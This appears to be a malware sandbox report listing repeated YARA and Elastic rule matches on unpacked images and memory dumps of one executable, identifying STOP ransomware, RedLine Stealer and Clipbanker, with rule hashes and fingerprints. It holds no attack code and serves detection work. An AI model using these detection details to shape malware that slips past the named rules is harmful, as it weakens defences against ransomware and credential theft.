Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.343989029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.350733876.0000000002105000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000002.378588767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000000.347198189.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.347163945.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000006.00000000.321377469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.351892792.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.304747895.000000000218B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.301522504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
